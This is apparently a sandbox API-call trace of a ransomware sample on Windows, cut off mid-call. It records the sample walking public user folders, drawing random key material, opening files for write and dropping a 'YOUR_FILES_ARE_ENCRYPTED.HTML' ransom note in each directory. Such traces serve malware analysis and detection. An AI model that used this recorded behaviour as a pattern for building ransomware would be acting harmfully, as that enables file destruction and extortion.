cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.821] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.821] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0110.821] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.821] lstrlenW (lpString=".ini") returned 4 [0110.821] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.821] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0110.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0110.821] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=278) returned 1 [0110.822] CloseHandle (hObject=0x304) returned 1 [0110.822] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0110.822] StrStrIW (lpFirst="My Music", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.822] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned 38 [0110.822] GetProcessHeap () returned 0x600000 [0110.822] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0110.822] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Music" [0110.822] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*" [0110.823] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0xa908a809, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x768a68cc, ftLastAccessTime.dwHighDateTime=0x21010020, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x19eb48, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="꯺瞄\x0e฀棌皊", cAlternateFileName="翿")) returned 0xffffffff [0110.823] GetProcessHeap () returned 0x600000 [0110.823] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0110.823] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0110.823] StrStrIW (lpFirst="My Pictures", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.823] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned 41 [0110.823] GetProcessHeap () returned 0x600000 [0110.823] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0110.824] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures" [0110.824] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*" [0110.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0xa908a809, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x768a68cc, ftLastAccessTime.dwHighDateTime=0x21010020, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x19eb48, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="꯺瞄\x0e฀棌皊", cAlternateFileName="翿")) returned 0xffffffff [0110.824] GetProcessHeap () returned 0x600000 [0110.824] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0110.825] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d5bfea2, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0110.825] StrStrIW (lpFirst="My Videos", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.825] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned 39 [0110.825] GetProcessHeap () returned 0x600000 [0110.825] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0110.826] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Videos" [0110.826] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*" [0110.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0xa908a809, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x768a68cc, ftLastAccessTime.dwHighDateTime=0x21010020, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x19eb48, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="꯺瞄\x0e฀棌皊", cAlternateFileName="翿")) returned 0xffffffff [0110.826] GetProcessHeap () returned 0x600000 [0110.826] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0110.827] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d5bfea2, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0110.827] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.827] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0110.827] GetProcessHeap () returned 0x600000 [0110.827] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\documents\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.828] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.829] CloseHandle (hObject=0x314) returned 1 [0110.829] GetProcessHeap () returned 0x600000 [0110.829] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.829] GetProcessHeap () returned 0x600000 [0110.829] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.830] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0110.830] StrStrIW (lpFirst="Downloads", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.830] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads") returned 29 [0110.830] GetProcessHeap () returned 0x600000 [0110.830] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.830] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Public\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads") returned="\\\\?\\C:\\Users\\Public\\Downloads" [0110.830] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Downloads", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\*") returned="\\\\?\\C:\\Users\\Public\\Downloads\\*" [0110.830] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.831] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.831] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.831] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.831] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0110.831] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.831] lstrlenW (lpString=".ini") returned 4 [0110.831] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.831] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0110.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0110.831] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=174) returned 1 [0110.831] CloseHandle (hObject=0x304) returned 1 [0110.832] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0110.832] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.832] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0110.832] GetProcessHeap () returned 0x600000 [0110.832] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\downloads\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.832] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.833] CloseHandle (hObject=0x314) returned 1 [0110.833] GetProcessHeap () returned 0x600000 [0110.833] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.833] GetProcessHeap () returned 0x600000 [0110.833] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.834] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0110.834] StrStrIW (lpFirst="Libraries", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.834] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries") returned 29 [0110.834] GetProcessHeap () returned 0x600000 [0110.834] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.835] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Public\\Libraries" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries") returned="\\\\?\\C:\\Users\\Public\\Libraries" [0110.835] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Libraries", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\*") returned="\\\\?\\C:\\Users\\Public\\Libraries\\*" [0110.835] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626978 [0110.835] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.835] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.835] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.835] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0110.835] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.835] lstrlenW (lpString=".ini") returned 4 [0110.835] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.835] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0110.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0110.835] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=175) returned 1 [0110.835] CloseHandle (hObject=0x304) returned 1 [0110.835] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0110.835] StrStrIW (lpFirst="RecordedTV.library-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.835] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0110.835] PathFindExtensionW (pszPath="RecordedTV.library-ms") returned=".library-ms" [0110.836] lstrlenW (lpString=".library-ms") returned 11 [0110.836] PathFindExtensionW (pszPath="RecordedTV.library-ms") returned=".library-ms" [0110.836] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0 [0110.836] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0110.836] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0110.836] GetProcessHeap () returned 0x600000 [0110.836] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\libraries\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0110.838] WriteFile (in: hFile=0x314, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0110.839] CloseHandle (hObject=0x314) returned 1 [0110.839] GetProcessHeap () returned 0x600000 [0110.839] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.839] GetProcessHeap () returned 0x600000 [0110.839] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.840] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="Music", cAlternateFileName="")) returned 1 [0110.840] StrStrIW (lpFirst="Music", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.840] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music") returned 25 [0110.840] GetProcessHeap () returned 0x600000 [0110.840] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.841] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\Public\\Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music") returned="\\\\?\\C:\\Users\\Public\\Music" [0110.841] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\*") returned="\\\\?\\C:\\Users\\Public\\Music\\*" [0110.841] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626978 [0110.841] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.841] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.841] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.841] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0110.841] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.841] lstrlenW (lpString=".ini") returned 4 [0110.841] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0110.841] SystemFunction036 (in: 